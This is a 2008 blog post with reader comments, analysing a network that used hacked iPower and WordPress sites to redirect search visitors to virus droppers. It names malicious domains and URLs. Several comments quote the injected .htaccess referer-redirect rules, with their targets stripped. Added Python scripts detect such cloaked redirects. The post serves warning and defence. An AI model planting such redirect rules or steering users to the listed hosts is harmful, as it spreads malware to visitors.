
More computer crime anatomy

So a while ago, I posted extensively about an underground network of computer virus distributors that I'd uncovered while pursuing American ISP iPower Web about their ongoing, chronic security problems which I first wrote about last December.

It seems that in the brave new world of the Intertubes, crime does pay. It pays very well indeed, in fact. The network I documented earlier has morphed and changed radically in the past few weeks, and become larger and more resilient. In addition, a new attack vector has emerged: attacks on old, outdated versions of WordPress weblog software.

I know that a lot of folks on my flist maintain their own WordPress blogs. Please, please, please, if you run WordPress or know somebody who does, update your WordPress software. It's quick (takes about five minutes) and easy, and all versions of WordPress prior to 2.5 should be considered completely insecure.

In the past couple of weeks, I've noticed a huge surge in WordPress hack attacks, to the point where last Monday there were more hacked WordPress systems than hacked iPower Web sites that were being used to redirect folks to Eastern European virus downloaders. It seems quite likely that the hackers are using automated tools to find and automatically attack old WordPress installs, though one person I've spoken with says he believes his WordPress install was attacked through an insecure FTP username and password that was brute-force guessed as well.

The network that is being used to distribute viruses is being fed from a lot of different sources: hacked iPower sites (of course), hacked WordPress installations, Google Groups set up as malicious redirectors, custom attack domains piggybacked on top of legitimate Web URLs, and hijacked phpBB and phpNuke installs seem to be the most common. For an update on what's going on in the seamy computer underground, and a new map of the virus distribution network:

The updated virus distribution map as it existed last Monday (I've been sick for the last week and a half, so I haven't got 'round to writing this post) looks something like this.

A lot has changed since I constructed the first map. The biggest single difference is there are now a large number of sites that serve the function of www.traffloader.info: they choose a virus dropper at random to redirect a user to.

The network still works in pretty much the same way. The hackers place redirectors on hacked iPower sites, or on hacked WordPress, phpNuke, or phpBB sites, or the hackers hack the DNS entry for a Web site such as www.unicmanila.org (the official United Nations Web site for the Philippines) to add a new record for http://making-gay-porn.unicmanila.org/ (which redirects to one of the traffic handlers that in turn redirects to a virus dropper).


Many of the links here and elsewhere in this post are live. As of the time of this writing, they redirect to active virus distributors which can and will infect unpatched Windows computers, and in one case will try to infect Mac computers, with a virus. DO NOT click on these links if you don't know what you're doing. DO NOT allow any of these sites to download or install software onto your computer.

A visitor gets into the network by doing a Google search, which turns up one of the hackers' hacked sites. When he clicks on the Google result, he is sent to a traffic handling Web site. In the past, there was only one of these: traffloader.info, which kept a record of the Google search the user made and would then pick a virus dropper at random to send the user to. Doing this has several advantages: it places an extra step between the hacked Web site and the place where the virus comes from, making it more difficult to trace the source of the infection; and if one virus dropping Web site goes offline or is taken down, traffloader.info will simply start redirecting people to a different virus dropping Web site.

The traffloader.info URL itself, though, is a single point of failure. If traffloader.info is ever taken down (unlikely, since it's hosted in Eastern Europe and registered through crime-friendly, hacker-friendly registrar EST Domains), the whole network fails. And the hackers, apparently, have realized this.

In the past several weeks, many new Web sites have come online that do the same thing that traffloader.info does: they take a visitor, log the Google search the visitor made to get to a hacked site, then send the visitor off to another site that drops a virus. I've found several traffloader.info mirrors that are up and running as of the time of this writing:

traffloader.info/go.php (registrar: estdomains)
traff-mega.net/in.php (registrar: estdomains)
blyapizdets.info/go.php (registrar: estdomains)
kentford.cn/in.php (registered in China; currently using ns1.palaroid.info as name server, which is registered by estdomains)

So traffic comes in through a hacked Web site and goes to one of these sites. From there, it is redirected to one of the virus dropper sites, which have (as the chart above shows) exploded in number.
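An added example, not part of the original post: the pattern described above (a visitor arriving from a Google result is bounced onward, while someone typing the URL directly sees the normal page) leaves a distinctive split in a site's own access log. The script below, which I wrote for this page, walks combined-format log lines and reports paths that always redirect search-engine visitors yet serve 200 to everyone else; the log lines and addresses are constructed samples.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" log format; only the field layout matters here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# The search engines the rewrite rules quoted later in this thread key on.
ENGINE_RE = re.compile(r'(^|\.)(google|yahoo|msn|aol|ask|altavista)\.', re.I)

def from_search_engine(referer):
    # True when the Referer header's host belongs to one of the engines above.
    m = re.match(r'^https?://([^/]+)', referer or "")
    return bool(m) and bool(ENGINE_RE.search(m.group(1)))

def find_cloaked_redirects(lines):
    """Paths that always redirect search-engine visitors but serve 200 to everyone else:
    the trace a referer-conditioned redirect leaves, since the owner typing the URL
    directly never sees it while search visitors are bounced onward."""
    stats = defaultdict(lambda: [0, 0, 0, 0])  # [search_total, search_3xx, other_total, other_200]
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip, do not guess
        status, s = int(m["status"]), stats[m["path"]]
        if from_search_engine(m["referer"]):
            s[0] += 1
            s[1] += int(300 <= status < 400)
        else:
            s[2] += 1
            s[3] += int(status == 200)
    return sorted(p for p, (st, s3, ot, o2) in stats.items()
                  if st and st == s3 and ot and ot == o2)

# Constructed sample lines (not real traffic); addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Jul/2008:10:01:02 -0600] "GET /index.html HTTP/1.1" 302 0 "http://www.google.com/search?q=example" "Mozilla/5.0"',
    '198.51.100.7 - - [21/Jul/2008:10:02:10 -0600] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [21/Jul/2008:10:03:44 -0600] "GET /index.html HTTP/1.1" 302 0 "http://search.yahoo.com/search?p=example" "Mozilla/5.0"',
    '198.51.100.8 - - [21/Jul/2008:10:04:00 -0600] "GET /about.html HTTP/1.1" 200 2048 "http://www.google.com/search?q=about" "Mozilla/5.0"',
    '198.51.100.9 - - [21/Jul/2008:10:05:00 -0600] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(find_cloaked_redirects(SAMPLE_LOG))  # ['/index.html']
```

A path flagged here is worth checking with two requests of your own, one with a search-engine Referer header and one without, before looking for the rewrite rules that cause it.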

Some of the hacked WordPress installs don't redirect to a traffic handler site, but instead redirect directly to a virus dropper hosted at sexlookupworld.com.

Interestingly, some of the hacked WordPress sites also redirect, not to a virus dropper at all, but to www.cams.com (an affiliate pay-for-access porn Webcam site) or to xml.valary.com (which is a front-end for several pay-per-search search engines). It's possible the hackers responsible for the iPower intrusions and the WordPress hacks are also looking to expand their revenue stream by using the hacked Web sites to redirect to pay-per-search engines and old-fashioned affiliate porn sites. It's also possible that these particular hacks are the work of some other party, who has noticed the vulnerable WordPress installs (or possibly is using the same automated hacking tools that the virus guys are using) to try to piggyback on the WordPress exploits.

Another new twist is poisoned Google Groups. The hackers have set up a large number of Google Groups, which they are advertising by conventional and Weblog spam. These Google Groups have names like


Visiting the home page of any of these Google Groups reveals a link to sexlookupworld.com, which (predictably) attempts to install a virus on the visitor's system.

What's also interesting is that the number of payload sites which examine the visitor's browser user-agent and automatically install Mac or Windows malware has not proliferated. As of the time of this writing, I have identified only one site that tries to download Mac malware; the additional new payload sites still download Windows-only malware. I don't know if this means that the hackers have decided the number of Mac users who will infect themselves is too small to pay attention to, or if they simply have had their hands full expanding the network.

The new network is far more resilient than the old network was, and no longer has a single point of failure. It also has a much larger number of inputs, and more ways to trap the unwary into infecting themselves. The explosion of compromised WordPress installs is especially worrisome.

Folks, running software on your own Web server means vigilance. It's the price you pay for getting your own blog--now you own all the security concerns. I cannot stress this enough: If you run software, ANY software, on your server, you MUST be diligent in keeping up with security patches. As of version 2.5, WordPress now automatically notifies you of security updates when you log in to the administrator area. And again, if you are running any version of WordPress prior to 2.5 in any configuration, you should assume you can be pwn3d at will, and that potentially everything on your Web server is up for grabs. The hackers don't even have to target you specifically; judging from the number of compromised WordPress installs I've seen, they simply have to run automated programs that scan the Web searching for insecure WordPress installs.

Even the Boston Public Library's WordPress install has been hacked, and is currently hosting redirectors to virus droppers with URLs such as


This suggests the attackers have gained full access to the wp-content/uploads directory and can upload HTML files to it at will.

Edit: Mere minutes after posting this, I discovered another source of inputs to the network: compromised, fake, or otherwise dodgy Facebook profiles. Lots and lots and lots of them. Either within the profiles themselves, or within comments on the profile pages, I've seen a very large number of links to sexlookupworld.com.


( 21 comments — Leave a comment )
May. 5th, 2008 09:25 pm (UTC)
Oddly, I woke up to a nightmare this morning that malware had completely taken over my computer. It was everywhere and there was no getting rid of it.

I don't use wordpress, but I'm going to get very cautious, now.

And, yeah, I know this is a completely weird comment.

Edited at 2008-05-05 10:09 pm (UTC)
May. 5th, 2008 11:40 pm (UTC)
So how is this exploiting WP? As I understood it, the security fixes recently were only an issue if you allowed people to create accounts.
May. 6th, 2008 02:12 am (UTC)
Thanks for the warning! We're updating tonight.
May. 8th, 2008 05:15 pm (UTC)
Franklin - thanks so much for this warning. I understand enough of it that upgrading is now my first priority. I've also linked to this on Twitter.
May. 12th, 2008 08:45 am (UTC)
Thank you again for this warning.

One of the communities I am part of, called moviebuffs, has been receiving posts from users called video_maniac and narutoadddict (as have other communities) with a link that looks suspiciously like it will lead to a malware site. After my run-in with one of these in March, I'm not clicking to see if it does, though. :)
May. 12th, 2008 04:25 pm (UTC)
I took a look at that community, and yes, you are absolutely right. The messages in that community redirect (through two intermediaries) to a Russian-hosted site that attempts to drop W32/Zlob on the user's computer.
Jun. 25th, 2008 10:21 am (UTC)
Gogo.php found on several sites
Hi, I have found today several files on my server (separate accounts); they have been created in a folder "UPLDR" and they are all named gogo.php. This runs a script that redirects to "remote_host = "http://alojados.com/images/put.php";

Any idea how they get in?

Jun. 26th, 2008 04:35 am (UTC)
quite a new system...
This is fascinating, I've never heard of a system like this before, and I'm finding out first hand: my girlfriend's computer has it, infected.

now... how does one clean it all up?
Jun. 26th, 2008 03:16 pm (UTC)
Re: quite a new system...
If you're on a Mac, there are directions for cleaning it up in the comments above. On a PC, it's more difficult; much PC antivirus software still does not detect Zlob, even though it's been circulating for a long time. If you're running Windows, there are manual removal instructions here.
Jul. 21st, 2008 01:21 pm (UTC)
iPowerWeb hacked again
iPowerWeb has been hacked again. My website (www.durangobill.com) is hosted by iPowerWeb. At some point in the last two weeks the following ".htaccess" file showed up in my home folder. What it does is to redirect any incoming search query to a malware site. The malware site will try to infect your computer with something under the guise that it is recommending that you install a security program. I've notified iPowerWeb and Google security about the problem, but at this point the problem is still alive and malicious.

Caution - - - The link below connects to malware

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* [R,L]
Errordocument 404

Caution - - - The link above connects to malware

Sincerely,
Bill Butler
E-mail: lisabill@mydurango.net
Website: http://www.durangobill.com

(You can go directly to the above website and there isn't a problem. If you go through a major search engine that links to any of my web pages, you will be redirected to the malware website.)
Jul. 22nd, 2008 07:27 pm (UTC)
Re: iPowerWeb hacked again
Wow. Now that's interesting. Thanks for the update!
Jul. 28th, 2008 03:36 pm (UTC)
I too have a site hosted on iPower with a hacked .htaccess file. They seem to place the file outside of the webroot, in the hosting root on mine. The first 65 lines of the file are blank, followed by the mod_rewrite commands listed. Just a warning: the links below appear to go to malware. I've stripped the http:// off the front of the IPs to remove the link.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* [R,L]
Errordocument 404
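An added example, not code from the original post or its commenters: a small audit of an .htaccess file for the injection pattern quoted in this thread, namely a run of leading blank lines, HTTP_REFERER conditions followed by an external redirect, and an ErrorDocument pointing off-site. The sample file is constructed to mirror the one above, with a placeholder host standing in for the stripped target, and OWN_HOST is an assumed value for the audited site.

```python
import re
from urllib.parse import urlparse

OWN_HOST = "www.example.com"  # the audited site's own host (assumed for this sample)

COND_RE = re.compile(r'^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+\S+', re.I)
RULE_RE = re.compile(r'^\s*RewriteRule\s+(?P<pat>\S+)(?:\s+(?P<target>[^\[\s]\S*))?'
                     r'(?:\s+\[(?P<flags>[^\]]*)\])?', re.I)
ERRDOC_RE = re.compile(r'^\s*ErrorDocument\s+(?P<code>\d{3})\s+(?P<target>\S+)', re.I)

def off_site(target):
    # True when target is an absolute URL on a host other than our own.
    host = urlparse(target or "").netloc.lower()
    return bool(host) and host != OWN_HOST

def audit_htaccess(text):
    lines = text.splitlines()
    findings = []
    # The files quoted in this thread began with ~65 empty lines so the rules sit out of view.
    pad = next((i for i, l in enumerate(lines) if l.strip()), len(lines))
    if pad >= 20:
        findings.append(f"{pad} leading blank lines hide the directives")
    pending = 0  # HTTP_REFERER RewriteConds waiting for their RewriteRule
    for n, line in enumerate(lines, 1):
        if COND_RE.match(line):
            pending += 1
            continue
        rule, err = RULE_RE.match(line), ERRDOC_RE.match(line)
        if rule:
            flags = [f.strip().upper() for f in (rule["flags"] or "").split(",")]
            redirects = any(f == "R" or f.startswith("R=") for f in flags)
            if pending and (redirects or off_site(rule["target"])):
                findings.append(f"line {n}: referer-conditioned redirect -> "
                                f"{rule['target'] or '<target missing>'}")
            pending = 0  # conditions apply only to the rule that follows them
        elif err and off_site(err["target"]):
            findings.append(f"line {n}: ErrorDocument {err['code']} sends visitors off-site")
    return findings

# Constructed sample modelled on the quoted file; the redirect host is a placeholder.
SAMPLE_HTACCESS = "\n" * 65 + """RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://malware-redirect.example/go.php [R,L]
ErrorDocument 404 http://malware-redirect.example/404.php
"""
```

Run it over every .htaccess in the account, including the hosting root above the webroot where one commenter found the file, since a redirect placed there applies to everything beneath it.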
Aug. 6th, 2008 08:22 pm (UTC)
Is this a server problem?
Hello all! Yesterday I found that my .htaccess had changed, with the same redirection code as in the posts above (with 65 empty lines at the beginning, also).
I've been looking for the bug (XSS, HTTP injection) in my HTTP logs or any unauthorized access in the FTP logs, but I can't find anything that changed my .htaccess.
Do you mean this is a server problem and not one of my PHP scripts? How can someone change the .htaccess file without logging on to the server? How can I avoid this?
Aug. 6th, 2008 08:34 pm (UTC)
Re: Is this a server problem?
Given the number and severity of the security breaches at iPower, I believe it is a server problem, most likely an exploit within their vDeck platform. It seems to me that any iPower server can be penetrated, even if the particular sites on it do not contain vulnerable PHP scripts or other vulnerabilities.
Aug. 7th, 2008 09:15 am (UTC)
Re: Is this a server problem?
Thank you, but my server is Lypha and it uses cPanel... I am so worried about this problem and I can't find where the bug is. Any clue will be welcome.
Aug. 7th, 2008 03:03 pm (UTC)
Re: Is this a server problem?
Now that is interesting. I haven't seen this kind of attack on ISPs other than iPower, so that's a worrisome development. Do you know what version of cPanel they use?
Aug. 8th, 2008 09:03 am (UTC)
Re: Is this a server problem?
cPanel version is 11.23.4-STABLE.
BTW, I've found that my .htaccess was uploaded through FTP, according to my hosting support, from an IP of the sbcglobal.net (AT&T) provider, in Chicago.
I have changed my FTP password, but I don't think this was the problem, since my last password is too long to break with brute force.
Aug. 8th, 2008 08:54 pm (UTC)
My server got this same hack...
I too run a CPanel server and one of the clients on my server had this htaccess file installed in the web root. I will have to do some more checking to see where it came from.
Aug. 11th, 2008 08:47 pm (UTC)
ipower hacking
I am another hacked site, and am not web savvy enough to know a lot of the technical information, but I AM upset that a copy of my website popped up as a www. address and infected two of my customers. I looked at the source code of this bogus site and it appears that the malware is gone; there is mostly the code I wrote plus an add-on http-equiv line that my webhost put in when they removed the malware. The domain I pay for is simply http://tesselliott.com but a Google search on my name pops up: http://www.tesselliott.com and last week two of my customers got redirected from there to strange places, and found malware on their computers. How is it that my website is in two places at the same time? This may seem like a dumb question, but I am actually proud of being an artist who can deal with the internet and write my own HTML. Am determined to learn what I need to know for security. And thank you for your efforts.
Feb. 24th, 2010 12:28 am (UTC)
Whoa! Thanks for this factual information.